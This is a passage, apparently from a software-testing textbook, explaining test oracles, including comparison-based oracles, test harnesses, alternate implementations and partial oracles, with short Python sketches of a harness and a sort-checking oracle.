The output of the two is then compared to determine whether the program behaved correctly for the test cases. To help the oracle determine the correct behavior, it is important that the behavior of the system or component be unambiguously specified and that the specification itself be error free.

There are some systems where oracles are automatically generated from specifications of programs or modules. With such oracles, we are assured that the output of the oracle is consistent with the specifications.

It is of little use to execute a test suite automatically if the execution results must be manually inspected to apply a pass/fail criterion. Relying on human intervention to judge test outcomes is not merely expensive but also unreliable. Even the most conscientious and hard-working person cannot maintain the level of attention required to identify one failure in a hundred program executions, let alone one in ten thousand. That is a job for a computer.

Software that applies a pass/fail criterion to a program execution is called a test oracle, often shortened to oracle. In addition to rapidly classifying a large number of test case executions, automated test oracles make it possible to classify behaviors that exceed human capacity in other ways, such as checking real-time response against latency requirements or dealing with voluminous output data in a machine-readable rather than human-readable form.

Ideally, a test oracle would classify every execution of a correct program as passing and would detect every program failure. In practice, the pass/fail criterion is usually imperfect. A test oracle may apply a pass/fail criterion that reflects only part of the actual program specification, or is an approximation, and therefore passes some program executions it ought to fail. Several partial test oracles (perhaps applied with different parts of the test suite) may be more cost-effective than one that is more comprehensive. A test oracle may also give false alarms, failing an execution that it ought to pass. False alarms in test execution are highly undesirable, not only because of the direct expense of manually checking them, but because they make it likely that real failures will be overlooked. Nevertheless, sometimes the best we can obtain is an oracle that detects deviations from expectation that may or may not be actual failures.

One approach to judging correctness, but not the only one, compares the actual output or behavior of a program with predicted output or behavior. A test case with a comparison-based oracle relies on predicted output that is either precomputed as part of the test case specification or can be derived in some way independent of the program under test. Precomputing expected test results is reasonable for a small number of relatively simple test cases, and it is still preferable to manual inspection of program results because the expense of producing (and debugging) predicted results is incurred once and amortized over many executions of the test case.


Support for comparison-based test oracles is often included in a test harness program or testing framework. A harness typically takes two inputs: (1) the input to the program under test (or something that can be mechanically transformed into a well-formed input), and (2) the predicted output. Frameworks for writing test cases as program code likewise provide support for comparison-based oracles. A minimal sketch follows.
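The following Python sketch shows the shape of such a harness; run_program stands in for invoking the program under test and is invented for this example (here it simply sorts a list so that the sketch is runnable).

def run_program(test_input):
    """Hypothetical stand-in for the program under test."""
    return sorted(test_input)

# Test cases as (program input, predicted output) pairs.
test_cases = [
    ([3, 1, 2], [1, 2, 3]),
    ([], []),
    ([5, 5, 1], [1, 5, 5]),
]

def harness(cases):
    """Compare actual output with predicted output for each pair."""
    for test_input, predicted in cases:
        actual = run_program(test_input)
        verdict = "pass" if actual == predicted else "fail"
        print(f"input={test_input!r} verdict={verdict}")

harness(test_cases)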

Comparison-based oracles are useful mainly for small, simple test cases, but sometimes expected outputs can also be produced for complex test cases and large test suites. Capture-replay testing, a special case in which the predicted output or behavior is preserved from an earlier execution, is discussed in this chapter. A related approach is to capture the output of a trusted alternate version of the program under test. For example, one may produce output from a trusted implementation that is for some reason unsuited for production use; it may be too slow or may depend on a component that is not available in the production environment. It is not even necessary that the alternative implementation be more reliable than the program under test, as long as it is sufficiently different that the failures of the real and alternate versions are likely to be independent, and both are sufficiently reliable that not too much time is wasted determining which one has failed a particular test case on which they disagree.

Figure 17.2: A test harness with a comparison-based test oracle processes test cases consisting of (program input, predicted output) pairs.

A third approach to producing complex (input, output) pairs is sometimes possible: It may be easier to produce program input corresponding to a given output than vice versa. For example, it is simpler to scramble a sorted array than to sort a scrambled array.

A common misperception is that a test oracle always requires predicted program output to compare to the output produced in a test execution. In fact, it is often possible to judge output or behavior without predicting it. For example, if a program is required to find a bus route from station A to station B, a test oracle need not independently compute the route to ascertain that it is in fact a valid route that starts at A and ends at B.

Oracles that check results without reference to a predicted output are often partial, in the sense that they can detect some violations of the actual specification but not others. They check necessary but not sufficient conditions for correctness. For example, if the specification calls for finding the optimum bus route according to some metric, a validity check is only a partial oracle because it does not check optimality. Similarly, checking that a sort routine produces sorted output is simple and cheap, but it is only a partial oracle because the output is also required to be a permutation of the input. A cheap partial oracle that can be used for a large number of test cases is often combined with a more expensive comparison-based oracle that can be used with a smaller set of test cases for which predicted output has been obtained. The sorting example is sketched below.
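To make the sorting example concrete, the Python sketch below shows the cheap partial oracle (the output is sorted) alongside the additional check (the output is a permutation of the input); for sorting, the two checks together capture the full specification.

from collections import Counter

def is_sorted(xs):
    """Cheap partial oracle: necessary but not sufficient for correctness."""
    return all(a <= b for a, b in zip(xs, xs[1:]))

def is_permutation(inp, out):
    """Complementary check: the output must rearrange exactly the input."""
    return Counter(inp) == Counter(out)

def sort_oracle(inp, out):
    # Together these two conditions capture the specification of sorting.
    return is_sorted(out) and is_permutation(inp, out)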

Ideally, a single expression of a specification would serve both as a work assignment and as a source from which useful test oracles were automatically derived. Specifications are often incomplete, however, and their informality typically makes automatic derivation of test oracles impossible. The idea is nonetheless a powerful one, and wherever formal or semiformal specifications (including design models) are available, it is worthwhile to consider whether test oracles can be derived from them. Some of the effort of formalization will be incurred either early, in writing specifications, or later, when oracles are derived from them, and earlier is usually preferable.